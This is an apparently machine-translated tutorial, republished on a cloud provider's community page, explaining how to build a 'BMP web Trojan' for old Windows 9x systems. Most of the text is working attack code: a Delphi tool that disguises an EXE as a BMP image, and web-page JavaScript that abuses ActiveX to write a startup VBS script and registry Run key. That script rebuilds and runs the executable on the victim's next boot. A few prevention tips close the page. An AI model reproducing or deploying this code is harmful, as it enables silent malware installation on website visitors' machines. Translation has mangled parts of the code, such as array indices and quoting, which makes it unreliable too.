What is a BMP Web Trojan? It is different from the Trojan horse that used to be a smelly MIME head, MIME Trojan is an EXE file with MIME encoding for a eml (out look letter) file, put on the Web page using IE and OE coding vulnerabilities to achieve automatic download and implementation.
However, BMP Trojan is different, it is a exe file disguised as a BMP image file, cheat ie automatic download, and then use the Web page JavaScript script to find the Internet temporary folder of the client, find the download BMP file, Copy it to the temp directory. Write a script to restore the found BMP file to the EXE with debug, and put it in the registry startup key, and execute it on the next boot. But this technology can only work under 9X, for 2K,XP is powerless.
Looks like it's complicated, so here's a step-by-step step:
1) EXE variable BMP method.
Everyone to check the BMP file will know, BMP file header has 54 bytes, simple to include BMP file in the long width, the number of digits, file size, data area length, we just in the EXE file header before adding the corresponding BMP file head ( Of course BMP file header inside the data to conform to the size of the EXE file, so you can cheat ie download the BMP file, we started using JPG file to do experiments, found that if the file header is not correct, IE is not downloaded, the conversion code is as follows:
Program Exe2bmp;
Uses
Windows
Sysutils;
var Len,row,col,fs:dword;
Buffer:array[0..255]of Char;
Fd:win32_find_data;
H,hw:thandle;
Begin
if (PARAMSTR (1) <> ') and (Paramstr (2) <> ') THEN BEGIN////If no two parameters after run exit
If FileExists (PARAMSTR (1)) THEN BEGIN
FindFirstFile (Pchar (PARAMSTR (1)), FD);
Fs:=fd.nfilesizelow;
Col: = 4;
While True does begin
if (fs MoD) =0 then BEGIN
Len:=fs;
End Else len:=fs+12-(FS mod 12);
Row: = Len Div Col Div 3;
If Row>col then BEGIN
col:=col+4;
End else break;
End
Fillchar (buffer,256,0);
{Once for BMP file header data}
buffer[0]:= ' B '; buffer[1]:= ' M ';
Pdword (@buffer [a]) ^:=col;
Pdword (@buffer [)] ^:=row;
Pdword (@buffer [^:=len]);
Pdword (@buffer [2]) ^:=len+54;
Pdword (@buffer [10]) ^:=54;
Pdword (@buffer [14]) ^:=40;
Pword (@buffer [26]) ^:=1;
Pword (@buffer [28]) ^:=24;
{Write to File}
Hw:=createfile (Pchar (PARAMSTR (2)), generic_write,file_share_read or file_share_write,nil,create_always,0,0);
H:=createfile (Pchar (PARAMSTR (1)), generic_read,file_share_read or file_share_write,nil,open_existing,0,0);
WriteFile (hw,buffer,54,col,0);
Repeat
ReadFile (h,buffer,256,col,0);
WriteFile (hw,buffer,col,col,0);
untilcol<>256;
WriteFile (hw,buffer,len-fs,col,0);
CloseHandle (h);
CloseHandle (HW);
End
End
End.
The above code can be compiled in delphi4,5,6, you can get a exe2bmp.exe file. Everyone open the Msdos way, enter
Exe2bmp Myexe.exe mybmp.bmp
Enter to convert the EXE file specified in the second parameter to BMP format.
Then it is to put the BMP picture on the Web page, if you open this picture, it must be found that the BMP and flowers, color and monotonous. So it's best to use this format on the Web.
Here are the scripts that are placed on the Web page
document.write (");
function Docsave ()
{
A=document.applets[0];
A.setclsid (' {f935dc22-1cf0-11d0-adb9-00c04fd58a0b} ');
A.createinstance ();
Wsh=a.getobject ();
A.setclsid (' {0d43fe01-f093-11cf-8940-00a0c9054228} ');
A.createinstance ();
Fso=a.getobject ();
var winsys=fso. GetSpecialFolder (1);
var vbs=winsys+ ' S.vbs ';
Wsh. RegWrite
(' Hkcusoftwaremicrosoftwindowscurrentversionrunvbs ', ' WScript ' + ' "' +vbs+ '");
var st=fso. CreateTextFile (vbs,true);
St. WriteLine (' Option Explicit ');
St. WriteLine (' Dim fso,wsh,cache,str ');
St. WriteLine (' Set FSO = CreateObject ("Scripting. FileSystemObject ")");
St. WriteLine (' Set WSH = CreateObject (' Wscript.Shell ') ');
St. WriteLine (' Cache=wsh. RegRead ("Hkcusoftwaremicrosoftwindowscurrentversionexplorershellfolderscache");
St. WriteLine (' WSH. RegDelete ("Hkcusoftwaremicrosoftwindowscurrentversionrunvbs");
St. WriteLine (' WSH. RegWrite "Hkcusoftwaremicrosoftwindowscurrentversionrun MP", "Tmp.exe");
St. WriteLine (' Searchbmpfile fso. GetFolder (CACHE), "mybmp[1].bmp");
St. WriteLine (' Wscript.Quit () ');
St. WriteLine (' Function searchbmpfile (folder,fname) ');
St. WriteLine (' Dim subfolder,file,lt,tmp,winsys ');
St. WriteLine (' Str=fso. Getparentfoldername (folder) & "& Folder.name &" "& FName");
St. WriteLine (' If FSO. FileExists (str) then ');
St. WriteLine (' Tmp=fso. GetSpecialFolder (2) & "" ");
St. WriteLine (' Winsys=fso. GetSpecialFolder (1) & "" ");
St. WriteLine (' Set FILE=FSO. GetFile (str) ");
St. WriteLine (' File.Copy (tmp & "Tmp.dat");
St. WriteLine (' File.delete ');
St. WriteLine (' Set LT=FSO. CreateTextFile (tmp & "tmp.in");
St. WriteLine (' Lt.writeline (' rbx ') ');
St. WriteLine (' Lt.writeline ("0"));
St. WriteLine (' Lt.writeline (' RCX ') ');
St. WriteLine (' Lt.writeline ("1000"));
St. WriteLine (' Lt.writeline (' w136 ') ');
St. WriteLine (' Lt.writeline (' Q ') ');
St. WriteLine (' Lt.close ');
St. WriteLine (' WSH. Run "command/c Debug" & tmp & "Tmp.dat <" & tmp & "Tmp.in >" & tmp & "Tmp.out", false,6 ');
St. WriteLine (' on Error Resume Next ');
St. WriteLine (' FSO. GetFile (tmp & "Tmp.dat"). Copy (Winsys & "Tmp.exe");
St. WriteLine (' FSO. GetFile (tmp & "Tmp.dat"). Delete ");
St. WriteLine (' FSO. GetFile (tmp & "Tmp.in"). Delete ");
St. WriteLine (' FSO. GetFile (tmp & "Tmp.out"). Delete ");
St. WriteLine (' End If ');
St. WriteLine (' If Folder.SubFolders.Count <> 0 Then ');
St. WriteLine (' For each subfolder in Folder.subfolders ');
St. WriteLine (' Searchbmpfile subfolder,fname ');
St. WriteLine (' Next ');
St. WriteLine (' End If ');
St. WriteLine (' End Function ');
St. Close ();
}
SetTimeout (' Docsave () ', 1000);
Save the script as "js.js" and insert it in the Web page:
<script src= "Js.js" ></script>
The script basically generates a "s.vbs" file in the system directory of the Local machine, which runs automatically the next time it is powered on. Primarily used to locate mybmp[1].bmp files from a temporary directory.
The main contents of the "S.vbs" document are as follows:
Option Explicit
Dim Fso,wsh,cache,str
Set FSO = CreateObject ("Scripting.") FileSystemObject ")
Set WSH = CreateObject ("Wscript.Shell")
Cache=wsh. RegRead ("Hkcusoftwaremicrosoftwindowscurrentversionexplorershellfolderscache")
Wsh. RegDelete ("Hkcusoftwaremicrosoftwindowscurrentversionrunvbs")
Wsh. RegWrite "Hkcusoftwaremicrosoftwindowscurrentversionruntmp", "Tmp.exe"
Searchbmpfile FSO. GetFolder (CACHE), "Mybmp[1].bmp"
Wscript.Quit ()
Function Searchbmpfile (Folder,fname)
Dim Subfolder,file,lt,tmp,winsys
' Find the target BMP picture from the temporary folder
Str=fso. Getparentfoldername (folder) & "" & Folder.name & "" & FName
If FSO. FileExists (str) Then
Tmp=fso. GetSpecialFolder (2) & ""
Winsys=fso. GetSpecialFolder (1) & ""
Set FILE=FSO. GetFile (str)
File.Copy (tmp & "Tmp.dat")
File.delete
' Generate a Debug script
Set LT=FSO. CreateTextFile (tmp & "Tmp.in")
Lt.writeline ("RBX")
Lt.writeline ("0")
Lt.writeline ("RCX")
' 1000 of the line below is hexadecimal, and the decimal is 4096 (the number is the size of your EXE file)
Lt.writeline ("1000")
Lt.writeline ("w136")
Lt.writeline ("q")
Lt.close
WSH. Run "command/c Debug" & tmp & "Tmp.dat <" & tmp & "Tmp.in>" & tmp & "Tmp.out", false,6
On Error Resume Next
Fso. GetFile (tmp & "Tmp.dat"). Copy (Winsys & "Tmp.exe")
Fso. GetFile (tmp & "Tmp.dat"). Delete
Fso. GetFile (tmp & "Tmp.in"). Delete
Fso. GetFile (tmp & "Tmp.out"). Delete
End If
If Folder.SubFolders.Count <> 0 Then
For each subfolder in Folder.subfolders
Searchbmpfile Subfolder,fname
Next
End If
End Function
This script will find the BMP file in the temporary folder, and generate a debug script, the runtime will automatically read the BMP file 54 bytes from the size of the data you specify, and save it to the Tmp.dat. The script is then copied to the system's directory. This restored EXE will run at the next reboot. This is the basic implementation process of BMP Trojan horse.
Detailed scripting code please refer to Http://hotsky.363.net
Precautionary method:
Simplest, delete or rename wscrpit.exe files and debug files;
Install effective antivirus software, because these scripts have a lot of anti-virus software can be found out.
When conditions permit, install Win2K SP3, try to avoid some unknown origins of the site.
The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion;
products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the
content of the page makes you feel confusing, please write us an email, we will handle the problem
within 5 days after receiving your email.
If you find any instances of plagiarism from the community, please send an email to:
info-contact@alibabacloud.com
and provide relevant evidence. A staff member will contact you within 5 working days.